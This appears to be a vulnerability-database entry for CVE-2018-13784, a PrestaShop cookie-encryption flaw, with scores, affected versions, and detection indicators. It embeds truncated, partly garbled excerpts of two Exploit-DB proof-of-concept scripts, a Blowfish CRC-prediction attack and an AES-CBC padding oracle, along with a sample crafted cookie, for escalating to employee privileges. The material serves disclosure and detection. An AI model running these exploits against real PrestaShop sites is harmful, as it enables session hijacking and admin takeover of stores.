CVE-2018-13784
published 2018-07-09CVE-2018-13784: PrestaShop before 1.6.1.20 and 1.7.x before 1.7.3.4 mishandles cookie encryption in Cookie.php, Rinjdael.php, and Blowfish.php.
PriorityP267critical9.1CVSS 3.0
AVNACLPRNUINSUCHIHAN
EXPLOIT
EPSS
16.67%
96.6th percentile
PrestaShop before 1.6.1.20 and 1.7.x before 1.7.3.4 mishandles cookie encryption in Cookie.php, Rinjdael.php, and Blowfish.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| prestashop | prestashop | < 1.6.1.20 | 1.6.1.20 |
| prestashop | prestashop | >= 1.7.0.0 < 1.7.3.4 | 1.7.3.4 |
Detection & IOCsextracted from sources · hover to see the quote
cookiePrestaShop-b0ebb4f17b3e451202e5b044e29ed75d=20NxjuYuGVhSt8n0M54Av9Qkpyzl9axkK%2BGgLLCcv0MLQZhLAEV8lnq6U2Ew2n5aMUOYqkrkpqjputuLiBEqqW7pIce8cUv%2F3SEFp3tPnWfCgJgXKUsR1htOQ4KAoXyYLhoc31kVgcm39OhQh5Zg3A78HnO1On2udHwN8dTRdI86kewEFZPNtmMeBF7sAr9zezevsjK1VU4BI84EVXCYQuuhnVehoqfAa9XoZC%2FD3FEmDSuspZw2AUB0S7Py6ks6eEeCVDWieBKDsHD13UK%2FzgM%2F65m5rpU1P4BSQSHN2Qs%3D000208↗
- →Detect padding oracle attack against PrestaShop AES-CBC cookies: look for repeated requests to the admin login endpoint with varying cookie values (base64-encoded blobs with a 6-digit numeric suffix) and HTTP 302 redirects to AdminLogin used as the padding oracle signal. ↗
- →PrestaShop session cookies exploited in this CVE follow the naming pattern 'PrestaShop-<md5hash>'; monitor for cookies matching this pattern being submitted with anomalous base64 payloads (especially payloads with appended 6-digit size suffixes). ↗
- →Detect exploit stage where attacker posts to /index.php with 'recover_cart' and 'token_cart' parameters to hijack a customer cart and escalate to employee/admin session. ↗
- →Monitor for high-frequency requests to the PrestaShop admin endpoint (e.g., /index.php, /pdf.php) with rapidly changing cookie values from the same source IP — characteristic of automated padding oracle or CRC brute-force enumeration. ↗
- →The exploit uses a 6-digit numeric suffix appended to the base64-encoded cookie value to encode cookie size; detect PrestaShop cookies whose URL-decoded value ends with a 6-digit decimal string followed by no other characters as a malformed/exploit-crafted cookie indicator. ↗
- →Block size for the AES-CBC padding oracle is 16 bytes; the Blowfish/Rijndael variant uses SIZE_BLOCK=8. Anomalous cookie lengths that are exact multiples of 8 or 16 bytes (after base64 decode, minus the 6-digit suffix) should be flagged. ↗
- ·The exploit targets PrestaShop versions before 1.6.1.20 and 1.7.x before 1.7.3.4; the AES-CBC padding oracle PoC (EDB-45046) specifically targets <= 1.6.1.19 using openssl_encrypt(), while EDB-45047 targets the Blowfish/Rijndael path with an 8-byte block size. ↗
- ·The padding oracle detection relies on distinguishing HTTP 302 redirects to 'AdminLogin' (padding failure) vs. other responses (padding success); WAF/IDS rules should account for this redirect-based oracle and not just inspect request bodies. ↗
- ·The exploit requires the attacker to already have a valid authenticated session (employee or customer) to obtain an initial encrypted cookie value before launching the padding oracle or CRC prediction attack. ↗
CVSS provenance
nvdv3.09.1CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
nvdv2.06.4MEDIUMAV:N/AC:L/Au:N/C:P/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PrestaShop < 1.6.1.19 - 'BlowFish ECD' Privilege Escalation
exploitdb·2018-07-16
CVE-2018-13784 PrestaShop < 1.6.1.19 - 'BlowFish ECD' Privilege Escalation
PrestaShop
#!/usr/bin/env python3
# PrestaShop 0:
offset -= SIZE_BLOCK
return [
'%06d' % (len(blocks) * SIZE_BLOCK + offset)
]
def xor(a, b):
"""XORs two strings and returns the result as bytes.
"""
return bytes(x ^ y for x, y in zip(a.encode(), b.encode()))
def pb(n, z=False):
"""Returns the padding required to align n with SIZE_BLOCK, and its position
in blocks. The z flag indicates if padding can be zero.
"""
padding = (- n) % SIZE_BLOCK
if z and padding == 0:
padding = SIZE_BLOCK
block = (n + padding) // SIZE_BLOCK
return padding, block
crc32 = binascii.crc32
SIZE_BLOCK = 8
BASE_BYTE = '`'
SIZE_LASTNAME_TO_FIRSTNAME = bl(
'¤customer_firstname|'
)
SIZE_FIRSTNAME_TO_PASSWD = bl(
'¤logged|1¤is_guest|¤passwd|'
)
SIZE_FIRSTNAME_TO_EMAIL = SIZE_FIRSTNAME_TO_PASSWD + bl(
'86df199881eaf8e
Exploit-DB
PrestaShop < 1.6.1.19 - 'AES CBC' Privilege Escalation
exploitdb·2018-07-16
CVE-2018-13784 PrestaShop < 1.6.1.19 - 'AES CBC' Privilege Escalation
PrestaShop < 1.6.1.19 - 'AES CBC' Privilege Escalation
---
#!/usr/bin/env python3
# PrestaShop <= 1.6.1.19 AES (Rijndael) / openssl_encrypt() Cookie Read
# Charles Fol
#
# See https://ambionics.io/blog/prestashop-privilege-escalation
#
# This POC will reveal the content of an employee's cookie.
# By modifying it one can read/write any PrestaShop cookie.
# It is a simple padding oracle implementation.
#
import requests
import urllib.parse
import base64
s = requests.Session()
"""
s.proxies = {
'http': 'localhost:8080',
'https': 'localhost:8080',
}
#"""
# Login as an employee, get your cookie and paste it here along with the URL
URL = "http://vmweb5/prestashop/admin177chuncw/"
cookie = "PrestaShop-b0ebb4f17b3e451202e5b044e29ed75d=20NxjuYuGVhSt8n0M54Av9Qkpyzl9axkK%2BGgLLCcv0MLQZhLAEV8lnq
No writeups or analysis indexed.
http://build.prestashop.com/news/prestashop-1-7-3-4-1-6-1-20-maintenance-releases/https://github.com/PrestaShop/PrestaShop/pull/9218https://github.com/PrestaShop/PrestaShop/pull/9222https://www.exploit-db.com/exploits/45046/https://www.exploit-db.com/exploits/45047/http://build.prestashop.com/news/prestashop-1-7-3-4-1-6-1-20-maintenance-releases/https://github.com/PrestaShop/PrestaShop/pull/9218https://github.com/PrestaShop/PrestaShop/pull/9222https://www.exploit-db.com/exploits/45046/https://www.exploit-db.com/exploits/45047/
2018-07-09
Published